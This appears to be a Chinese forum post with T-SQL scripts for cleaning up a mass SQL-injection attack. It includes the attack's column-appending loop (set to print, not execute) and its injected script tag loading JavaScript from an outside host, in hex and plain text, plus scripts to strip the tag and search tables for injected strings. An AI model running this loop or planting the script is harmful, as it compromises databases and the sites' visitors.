22,209
社区成员
发帖
与我相关
我的任务
分享
declare @t varchar(255),@c varchar(255)
declare table_cursor cursor for
select a.name,b.name from sysobjects a,syscolumns b
where a.iD=b.iD AnD a.xtype='u'
AnD (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
open table_cursor fetch next from table_cursor
into @t,@c
while(@@fetch_status=0)
begin
print('update [' + @t + '] set [' + @c + ']=rtrim(convert(varchar,[' + @c + '])) + cast(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS varchar(67))')
fetch next from table_cursor into @t,@c
end
close table_cursor deallocate table_cursor;
declare @t varchar(255),@c varchar(255)
declare table_cursor cursor for
select a.name,b.name from sysobjects a,syscolumns b
where a.iD=b.iD AnD a.xtype='u'
AnD (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
declare @str varchar(500)
--这里是你要替换的字符
set @str='"></title><script src=http://s.see9.us/s.js></script><!--'
open table_cursor fetch next from table_cursor
into @t,@c while(@@fetch_status=0)
begin
exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')
fetch next from table_cursor into @t,@c
end
close table_cursor deallocate table_cursor;
--查某个指定字符出现在哪些表哪些字段:
declare @searchstr nvarchar(500)
set @searchstr ='3b3.org' --这里是你要查的字符内容
declare @t varchar(255),@c varchar(255)
create table # (name varchar(256),cols varchar(4000))
declare table_cursor cursor for
select a.name,b.name from sysobjects a,syscolumns b ,systypes c
where a.id=b.id and a.xtype='u' and b.xtype=c.xtype
and c.name in ('char','nchar','varchar','nvarchar','text','next')
open table_cursor fetch next from table_cursor
into @t,@c
while(@@fetch_status=0)
begin
exec('
set nocount on
if exists(select top 1 1 from [' + @t + '] where cast([' + @c + '] as varchar(8000)) like ''%'+@searchstr+'%'')
begin
if not exists(select 1 from # where name='''+@t+''')
insert into # select '''+@t+''','''+@c+'''
else
update # set cols=cols+'','+@c+''' where name='''+@t+'''
--select '+@c+' from [' + @t + '] where [' + @c + '] like ''%'+@searchstr+'%''
end
')
fetch next from table_cursor into @t,@c
end
close table_cursor deallocate table_cursor;
select name as '表名',cols as '列名' from #
drop table #